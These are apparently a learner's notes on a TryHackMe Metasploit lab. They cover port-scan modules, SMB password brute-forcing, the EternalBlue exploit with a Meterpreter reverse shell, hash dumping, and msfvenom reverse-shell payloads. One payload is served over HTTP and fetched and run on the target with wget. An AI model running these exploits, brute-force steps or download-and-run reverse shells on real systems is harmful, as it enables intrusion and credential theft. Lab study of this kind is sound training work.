In this room, we will learn how to use for vulnerability scanning and exploitation. We will also cover how the database feature makes it easier to manage penetration testing engagements with a broader scope. Finally, we will look at generating payloads with msfvenom and how to start a
session on most target platforms.
Please note that for all questions that require using a wordlist (e.g brute-force attacks), we will be using the wordlist on the AttackBox found at the following path:
/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
STEP1 :START METASPLOIT
STEP2:Check for portscanner components
. auxiliary/scanner/portscan/tcp (No. 5)
This is the most common scan type.
Function: Performs a full 3-way handshake (SYN → SYN-ACK → ACK)
Logic: If the connection completes, the port is open
Disadvantage: Easily detected in server logs because it creates a full connection
2. auxiliary/scanner/portscan/syn (No. 6)
Also known as Stealth Scan or Half-Open Scan
Function: Sends SYN, and if SYN-ACK is received, sends RST to terminate the connection early
Logic: Checks port status without fully establishing a connection
Advantage: Harder to detect compared to full TCP scan (especially on older firewalls)
3. auxiliary/scanner/portscan/ack (No. 4)
Used for firewall detection, not for finding open ports
Function: Sends an ACK packet pretending a connection already exists
Logic:
If RST is received → port is unfiltered
If no response → port is filtered (firewall present)
4. auxiliary/scanner/portscan/xmas (No. 3)
Called Xmas scan because it sets multiple flags (like "lights")
Function: Sends packets with FIN, PSH, and URG flags all set
Logic:
Closed port → sends RST
Open port → no response
Note: Not reliable on Windows (Windows sends RST for everything)
5. auxiliary/scanner/portscan/ftpbounce (No. 0)
An older but clever technique
Function: Uses a third-party FTP server to perform the scan
Logic: Hides your real IP address
Advantage: Target sees traffic coming from the FTP server, not from you
🔑 Summary
TCP → Full connection (loud)
SYN → Half-open (stealth)
ACK → Firewall detection
Xmas → Flag-based scan (limited use)
FTP Bounce → Indirect scanning (IP hidingagain use nmap into metasploit to scan the target
answer port =5
again
how to know the NETBios name
use
auxiliary/scanner/discovery/udp_sweep
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.129.161.21
RHOSTS => 10.129.161.21
msf auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.129.161.21->10.129.161.21 (1 hosts)
[*] Discovered NetBIOS on 10.129.161.21:137 (__MSBROWSE__:<01>:G ::<00>:U ::<03>:U ::<20>:U :ACME IT SUPPORT:<00>:G :ACME IT SUPPORT:<1d>:U :ACME IT SUPPORT:<1e>:G :00:00:00:00:00:00)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/discovery/udp_sweep) >answer=ACME IT SUPPORT
AGAIN services running
SMB
we see port 445 is open so we are going
COMMAND USED
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.129.161.21
set SMBUser penny
set PASS_FILE /usr/share/wordlists/metasploit/common_passwords.txt
set THREADS 16
set STOP_ON_SUCCESS true
runpassword=
POSTGRESSDB
how to connect postgress with msfconsole
🎯 Purpose of Connecting PostgreSQL to Metasploit
The connection between PostgreSQL and Metasploit (msfconsole) is done to enable data storage, management, and automation during penetration testing.
🔑 Why This Connection Is Important
1. Store Scan Results
- All data from tools like
db_nmapis saved in the database - Includes:
- Hosts (IPs)
- Open ports
- Services
- OS detection
👉 Without PostgreSQL, results disappear after you exit Metasploit
now go the msf
should be look like that
continue wtih scanning
db_nmap -sV -Pn -p- -T4 -vv 10.129.161.21
after that use hosts and services
# Start PostgreSQL service (database required by Metasploit)
systemctl start postgresql
# Initialize Metasploit database as postgres user (creates DB, users, schema)
sudo -u postgres msfdb init
# Launch Metasploit console
msfconsole
# Check if Metasploit is connected to PostgreSQL database
db_status
# List all available workspaces (project environments)
workspace
# Create a new workspace named "tryhackme"
workspace -a tryhackme
# Switch to the "tryhackme" workspace
workspace tryhackme
# Run Nmap scan (detect services + scan all 65535 ports, save results to DB)
db_nmap -sV -p- 10.129.161.21
# Display all discovered hosts stored in the database
hosts
# Display all discovered services and open ports
services
# Search for a specific service (e.g., NetBIOS) in stored results
services -S netbios
# Load SMB vulnerability scanner module (MS17-010 / EternalBlue check)
use auxiliary/scanner/smb/smb_ms17_010
# Automatically set RHOSTS using saved hosts from database
hosts -R
# Show module options and verify configuration
show options
# Execute the scan/exploit module
runVULNERBILITY SCANNING
EXPLOIT
step 1 scann vulnerbility
🔍 1. Basic Connectivity
ping 10.130.139.221 # check kama target iko reachable
🔎 2. Full Port Scan
nmap -p- -Pn 10.130.139.221 # scan all ports (full enumeration)
🔬 3. Service & Version Detection
nmap -sV -sC -Pn 10.130.139.221 # detect services + default scripts
🚨 4. General Vulnerability Scan
nmap -sV --script vuln -Pn 10.130.139.221 # scan vulnerabilities zote
🎯 5. SMB Specific Scan
nmap -p445 --script smb-vuln* -Pn 10.130.139.221 # SMB vulnerabilities zote
💥 6. Confirm MS17-010 (Targeted)
nmap -p445 --script smb-vuln-ms17-010 -Pn 10.130.139.221 # confirm EternalBlue
🚀 7. Start Metasploit
msfconsole # launch metasploit
🎯 8. Load Exploit
use exploit/windows/smb/ms17_010_eternalblue # EternalBlue exploit
⚙️ 9. Configure Target
set RHOSTS 10.130.139.221 # target IP
set LHOST 192.168.140.247 # your VPN IP (tun0)
set LPORT 4444 # listening port
📡 10. Set Payload
set payload windows/x64/meterpreter/reverse_tcp # meterpreter reverse shell
🔧 11. Stability Options
set ExitOnSession false # continue even after fail
set VERIFY_ARCH false # skip arch checks
set VERIFY_TARGET false # skip target checks
💣 12. Run Exploit
exploit # run attack
exploit # repeat kama fail (important)
🔁 13. Alternative Exploit (kama inagoma)
use exploit/windows/smb/ms17_010_psexec # alternative stable exploit
set RHOSTS 10.130.139.221
set LHOST 192.168.140.247
exploit
🎯 14. Session Management
sessions # list sessions
sessions -i 1 # interact with session
📂 15. Find Flag
dir C:\\ /s | findstr flag # search flag files
type C:\\Users\\*\\Desktop\\flag.txt # read flag
🔐 16. Dump Hashes
hashdump # dump NTLM hashescommand
nmap -p445 -Pn — script smb-vuln-ms17–010 10.130.139.221
run exploit
flag
MSFVENOM
Target: TryHackMe VM — 10.130.139.221
Attacker: Your AttackBox — 192.168.140.247
1. Generate Meterpreter Payload
On your AttackBox, run:
msfvenom-p linux/x86/meterpreter/reverse_tcpLHOST=192.168.140.247LPORT=4444-f elf > shell.elf
chmod+x shell.elfp linux/x86/meterpreter/reverse_tcp→ sets payload typeLHOST→ your AttackBox IPLPORT→ port to listen on (same for handler)f elf→ Linux executable format
2. Serve the Payload
Start a Python HTTP server to make the payload downloadable:
python3-m http.server9000- Payload URL will be:
http://192.168.140.247:9000/shell.elf
3. Start the Metasploit Handler
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST192.168.140.247
set LPORT4444
run- This listens for incoming connections from the payload
- Must match the LHOST and LPORT used in
msfvenom
4. Deploy Payload on Target
On the target machine (VM):
wget <http://192.168.140.247:9000/shell.elf>
chmod+x shell.elf
./shell.elf- This triggers the reverse connection back to your handler
5. Catch the Meterpreter Session
Back on the attacker terminal (Metasploit handler), you should see:
[*] Started reverse TCP handler on 192.168.140.247:4444
[*] Meterpreter session 1 opened- You now have interactive access to the target machine
6. Post Exploitation
- List users and hashes:
hashdump- Retrieve other users' password hashes for further analysis
Notes / Tips
- Minimum 2 terminals needed:
msfconsole(handler)python3 -m http.server(payload delivery)
- Optionally, 3rd terminal for target machine commands
- Ensure LHOST and LPORT match between
msfvenomand handler - Payload must be executable on the target
Windows
msfvenom -p
windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe >
rev_shell.exePHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X
LPORT=XXXX -f raw > rev_shell.phpASP
msfvenom -p
windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp >
rev_shell.aspPython
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX
-f raw > rev_shell.pyANSWEE=
→$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
HAPPY HACKING